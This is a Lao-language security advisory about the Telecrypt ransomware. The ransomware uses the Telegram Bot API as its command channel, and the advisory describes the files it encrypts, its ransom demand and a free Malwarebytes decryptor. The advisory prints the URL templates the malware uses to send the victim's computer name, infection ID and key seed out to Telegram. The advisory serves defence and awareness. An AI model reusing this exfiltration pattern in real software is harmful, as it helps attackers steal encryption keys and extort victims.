ແຈ້ງເຕືອນແລະຂໍ້ແນະນຳຜູ້ໃຊ້ທົ່ວໄປ

ພົບ​ Ransomware ໂຕ​ໃໝ່​ ໃຊ້​ Telegram ເປັນ​ C&C Server

ຂໍ້ມູນທົ່ວໄປ

ນັ​ກ​ວິໄ​ຈ​ດ້ານ​ຄວາມຫມັ້ນຄົງ​ປອດ​ໄພ​ຈາກ​ Kaspersky Lab ອອກ​ມາ​ເປີດ​ເຜີຍ​ເຖິງ​ Ransomware ໂຕ​ໃໝ່​ລ່າ​ສຸດ​ ຊື່​ວ່າ​ Telecrypt ຊຶ່ງ​ໃຊ້​ຊ່ອງ​ທາງ​ຂອງ​ Telegram ແອບ​ພິ​ເຄ​ຊັ່ນ​ສຳລັບ​ຮັບ​ສົ່ງ​ຂໍ້ຄວາມ​ທີ່​ມີ​ຄວາມໝັ້ນຄົງ​ປອດໄ​ພ​ສູງ​ ໃນ​ການ​ສົ່ງ​ຂໍ້​ມູນ​ລະຫວ່າງ​ມັນ​ແວ ​ແລະ ​ແຮັກ​ເກີ​.

News Images: rantelegram.jpg

Credit: Nicescene/ShutterStock

Telecrypt ຖືກ​ພັດທະນາ​ຂຶ້ນ​ໂດຍ​ໃຊ້​ພາສາ​ Delphi ຊຶ່ງ​ Binary ມີ​ຂະໜາດ​ພຽງ​ແຕ່ 3 MB ເທົ່າ​ນັ້ນ​ ຫຼັງ​ຈາກ​ທີ່​ Telecrypt ຖືກ​ຕິດ​ຕັ້ງ​ລົງໃນ​ເຄື່ອງ​ຂອງ​ເຫຍື່ອ​ແລ້ວ​ ມັນ​ຈະສ້າງ​ Telegram Bot ຜ່ານ​ທາງ​ Telegram API ຊຶ່ງ​ Bot ແຕ່​ລະໂຕ​ຈະ​ມີ​ Token ID ທີ່​ໄດ້​ຈາກ​ API ເປັນ​ຂອງ​ຕົວ​ເອງ​.

ຜົນກະທົບ

ຫຼັງ​ຈາກ​ທີ່​ເຫຍື່ອກົ​ດ​ຣັນ​ (Run) Telecrypt Binary ໂຕ​ Telegram Bot ຈະ Ping ໄປຫາ Telegram API ຜ່ານ​ທາງ​ https://api.telegram.org/bot/GetMe ເພື່ອ​ໃຫ້​ໝັ້ນໃຈ​ວ່າ​ Telegram Bot ຍັງສາມາດ​ເຮັດວຽກ​ໄດ້​ ແລະ ​ບໍ່​ຖືກ​ Telegram Admin ຈັດການ​, ຈາກ​ນັ້ນ​ Telecrypt ຈະ​ໃຊ້​ໂປຣ​ໂຕຄ​ອນ (Protocol) ​ຂອງ​ Telegram ໃນ​ການ​ສົ່ງ​ຂໍ້ຄວາມ​ຜ່ານ​ເຂົ້າໄປ​ຍັງ​ຊ່ອງ​ທາງ​ຂອງ​ Telegram ໂດຍ​ໃຊ້​ Token ID ທີ່​ໄດ້ຮັບ​ຫຼາຍ​ໃນ​ຕອນ​ທຳອິດ​ ຊຶ່ງ​ຂໍ້ຄວາມ​ທີ່​ສົ່ງ​ອອກ​ໄປ​ປະກອບ​ດ້ວຍ​ Computer Name, Infection ID ແລະ​ Key Seed ຊຶ່ງ​ເປັນ​ຊຸດ​ຕົວ​ເລກ​ທີ່​ໃຊ້​ເປັນ​ກະ​ແຈ​ສຳລັບ​ເຂົ້າ​ລະ​ຫັດ​ໄຟ​ລ໌​ຂໍ້​ມູນ

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >

ຕໍ່ມາ​ Telecrypt ຈະ​ຄົ້ນ​ຫາ​ໄຟ​ລ໌​ຂໍ້​ມູນ​ ໄດ້​ແກ່​ DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD ແລະ​ PDF ເພື່ອ​ເຂົ້າ​ລະຫັດ​, ເຊິ່ງ​ບາງ​ເວີ​​ຊັ່ນ​ (Version) ຈະ​ບໍ່​ໃສ່​ນາມ​ສະ​ກຸນ​​ຕໍ່​ທ້າຍ​ໄຟ​ລ໌​ ແຕ່​ບາງ​ເວີ​ຊັ່ນ​ຈະ​ໃສ່​ນາມ​ສ​ກຸນ​ .Xcri ເພີ່ມ​ເຂົ້າໄປ​ ເມື່ອ​ເຂົ້າ​ລະ​ຫັດ​ໄຟ​ລ໌​ທັງ​ໝົດ​ສຳເລັດ​ຮຽບຮ້ອຍ​ Telecrypt ຈະ​ສົ່ງ​ຂໍ້ຄວາມ​ໃນ​ຊ່ອງ​ທາງ​ເດີມ​ ແຕ່​ເພີ່ມ​ພາ​ຣາ​ມິ​ເຕີ​​ (Parameter) Stop ເຂົ້າໄປຕື່ມ.​

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >stop

ຈາກ​ນັ້ນ​ Telecrypt ຈະ​ດາວ​ໂຫຼດ​ໄຟ​ລ໌​ Xhelp.exe ມາ​ຕິດ​ຕັ້ງ​ລົງ​ໃນ​ເຄື່ອງ​ຂອງ​ເຫຍື່ອ​ເພື່ອ​ສະແດງ​ຂໍ້ຄວາມ​ເອີ້ນ​ຄ່າ​ໄຖ່​ດັ່ງ​ຮູບ​ດ້ານ​ລຸ່ມ​ນີ້:

News Images: rantelegram1.jpg

ຂໍ້ຄວາມ​ເອີ້ນຄ່າ​ໄຖ່​

News Images: rantelegram2.jpg

ລະ​ບຸ​ໃຫ້​ຊຳ​ລະ​ເງີນ​ຜ່ານ​ທາງ​ Yandex.Money ຫຼື Qiwi

News Images: rantelegram3.jpg

       ຫຼັງ​ປົດ​ລະຫັດ​ຈະ​ລະ​ບຸ​ຂໍ້ຄວາມ​ ຂອບໃຈ​ທີ່​ຊ່ວຍ​ສະໜັບ​ສະໜູນ​ເງິນ​ທຶນ​ໃຫ້​ແກ່​ໂປຣ​ແກຣມ​ເມີ​​ໂຕ​ນ້ອຍ​ໆ​

ຂໍ້ຄວາມ​ເອີ້ນ​ຄ່າ​ໄຖ່​ຖືກ​ຂຽນ​ໃນ​ພາສາຣັດ​ເຊຍ​ ແລະ​ ຮຽກ​ຮ້ອງ​ເງິນ​ຈຳນວນ​ 5,000 Rubles ຫຼື​ ປະ​ມານ​ 6,38,000 ກີບ​ ເພື່ອ​ປົດ​ລະຫັດ​ໄຟ​ລ໌​ ໂດຍ​ໃຫ້​ຊຳ​ລະ​ເງິນ​ຜ່ານ​ທາງ​ Yandex.Money ຫຼື​ Qiwi ຊຶ່ງ​ເປັນ​ຊ່ອງ​ທາງ​ການ​ຊຳ​ລະ​ເງິນ​ຍອດ​ນິຍົມ​ຂອງ​ຣັດ​ເຊຍ​.

ຂໍ້ແນະນຳໃນການປ້ອງກັນ ແລະ ແກ້ໄຂ

          ໃນປະຈຸບັນ ນັກວິເຄາະມັນແວ Nathan Scott ຈາກ Malwarebytes ສາມາດແຄັກ (Crack) ໄດ້ແລ້ວ, ເຊິ່ງເຮັດໃຫ້ທີມງານຂອງ Malwarebytes ສາມາດສ້າງເຄື່ອງມືທີ່ໃຊ້ໃນການຖອດລະຫັດມັນແວດັ່ງກ່າວສຳເລັດ, ທ່ານສາມາດດາວໂຫຼດເຄື່ອງມື Telecrypt decryptor ເພື່ອຖອດລະຫັດໄຟລ໌ໄດ້ບ່ອນນີ້.

ເອກະສານອ້າງອີງ:

  1. https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/
  2. https://www.techtalkthai.com/telecrypt-ransomware-uses-telegram-as-c2-server/
  3. https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
  4. http://www.bleepingcomputer.com/news/security/telecrypt-ransomware-cracked-free-decryptor-released-by-malwarebytes/